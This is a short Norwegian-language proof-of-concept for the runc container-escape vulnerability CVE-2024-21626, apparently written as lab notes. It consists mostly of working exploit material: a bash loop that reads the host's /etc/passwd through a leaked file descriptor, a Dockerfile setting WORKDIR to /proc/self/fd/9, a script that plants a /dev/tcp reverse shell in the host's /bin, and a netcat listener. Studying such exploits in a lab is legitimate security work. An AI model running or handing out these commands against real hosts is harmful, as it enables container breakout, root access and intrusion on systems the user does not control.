POC
Sett opp en VM med Ubuntu 20.04 og deretter laster du ned docker ved å følge guiden på deres nettside
https://docs.docker.com/engine/install/ubuntu/
Last ned sårbar versjon (runc 1.1.11 og tidligere) fra github repo til runc:
https://github.com/opencontainers/runc/releases
Valgte her runc.amd64 (avhengighet)
#! /bin/bash
for i in {4..20}; do
docker run -it --rm -w /proc/self/fd/$i ubuntu:20.04 bash -c "cat
/proc/self/cwd/../../../etc/passwd"
done
FROM ubuntu:20.04
RUN apt-get update -y && apt-get install netcat -y
ADD ./poc.sh /poc.sh
WORKDIR /proc/self/fd/9
docker build . -t navn_konteiner
#!/bin/bash
ip=$(hostname -I | awk '{print $1}')
port=1337
cat > /proc/self/cwd/../../../bin/bash.copy << EOF
#!/bin/bash
bash -i >& /dev/tcp/$ip/$port 0>&1
EOF
# listen and wait for reverse shell
nc -lvvp 1337
docker run -it --rm cve2024 bash /poc.sh
På root på vertsmaskinen kan vi se at det er laget et nytt skript ved filbanen /proc/self/cwd/../../../bin/
kalt 'bash.copy'
chmod +x bash.copy
./bash.copy
https://ethicalhacking.uk/cracking-containers-understanding-cve-2024-21626-in-runc/#gsc.tab=0